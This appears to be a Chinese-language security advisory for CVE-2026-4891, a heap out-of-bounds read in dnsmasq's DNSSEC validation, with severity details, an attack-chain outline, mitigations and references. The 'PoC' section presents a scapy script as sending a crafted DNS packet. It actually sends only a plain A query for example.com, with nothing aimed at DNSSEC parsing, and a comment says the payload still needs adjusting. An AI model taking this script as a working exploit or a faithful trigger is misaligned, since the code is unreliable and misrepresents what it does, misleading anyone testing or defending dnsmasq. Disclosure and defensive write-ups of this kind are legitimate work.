CVE-2026-4891: dnsmasq DNSSEC验证越界读取漏洞

漏洞信息

漏洞编号

CVE-2026-4891

漏洞类型

堆越界读取

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

dnsmasq

漏洞概述

CVE-2026-4891 是 dnsmasq 软件中 DNSSEC 验证组件发现的一个安全漏洞。该漏洞属于基于堆的越界读取漏洞。由于 DNSSEC 验证逻辑存在缺陷，远程攻击者可以通过发送特制的 DNS 数据包来触发此漏洞。成功利用可能导致信息泄露，尽管 CVSS 向量显示可用性影响为无，但描述中明确指出可能导致拒绝服务。此漏洞无需用户交互且无需认证即可通过网络被利用，对运行受影响版本的 dnsmasq 服务器构成潜在威胁。

技术细节

该漏洞的根源在于 dnsmasq 在处理 DNSSEC 验证过程中的内存管理错误。具体而言，当解析特制的 DNS 响应包时，程序未能正确验证数据长度或指针的有效性，导致读取了分配堆缓冲区之外的内存。这种越界读取操作虽然通常不会直接导致代码执行，但可以导致进程崩溃，从而造成拒绝服务。此外，攻击者可能利用读取到的内存内容泄露敏感信息，如堆布局或其他内部状态。由于 dnsmasq 广泛应用于各种 Linux 发行版和网络设备中作为 DNS 转发器和 DHCP 服务器，此漏洞的影响范围较广。攻击者只需向目标服务器发送恶意 DNS 数据包即可触发漏洞，利用门槛较低，无需认证或用户交互。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行受影响版本 dnsmasq 的 DNS 服务器。

STEP 2

构造数据包

攻击者利用漏洞细节，精心构造包含恶意数据的 DNS 数据包，旨在触发 DNSSEC 验证逻辑中的越界读取。

STEP 3

发送攻击

攻击者将特制的 DNS 数据包发送给目标服务器的 53 端口。

STEP 4

触发漏洞

目标服务器在解析 DNSSEC 签名时发生越界读取，导致服务崩溃或敏感内存信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-4891
Description: Heap-based out-of-bounds read in dnsmasq DNSSEC validation.
This script sends a crafted DNS packet to the target.
Usage: python3 poc.py <target_ip>
"""
import sys
from scapy.all import IP, UDP, DNS, DNSQR, send

def send_exploit(target_ip):
    # Construct a crafted DNS packet
    ip = IP(dst=target_ip)
    udp = UDP(sport=12345, dport=53)

    # Crafted DNS query with specific flags to trigger validation
    # Note: Adjust specific payload based on technical analysis of the bug
    dns = DNS(
        id=1337,
        qr=0, 
        opcode=0,
        rd=1, 
        qdcount=1,
        qd=DNSQR(qname="example.com", qtype="A")
    )

    packet = ip/udp/dns
    send(packet, verbose=0)
    print(f"[+] Packet sent to {target_ip}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
        sys.exit(1)
    send_exploit(sys.argv[1])

影响范围

dnsmasq (具体受影响版本需参考厂商公告)

Pi-hole FTL < v6.6.2

防御指南

临时缓解措施

建议立即检查并升级 dnsmasq 至厂商提供的修复版本。若暂时无法升级，请限制 DNS 服务的网络访问权限，仅对内网或可信客户端开放，并密切监控 dnsmasq 进程的运行状态及日志，以便及时发现异常崩溃情况。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4891
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4891
3 Details https://www.cvedetails.com/cve/CVE-2026-4891/
4 VulDB https://vuldb.com/cve/CVE-2026-4891
5 Link https://github.com/NixOS/nixpkgs/pull/519082
6 Link https://github.com/NixOS/nixpkgs/pull/519093
7 Link https://github.com/pi-hole/FTL/releases/tag/v6.6.2
8 Link https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2026q2/018471.html
9 Link https://thekelleys.org.uk/dnsmasq/CVE/
10 Link https://www.kb.cert.org/vuls/id/471747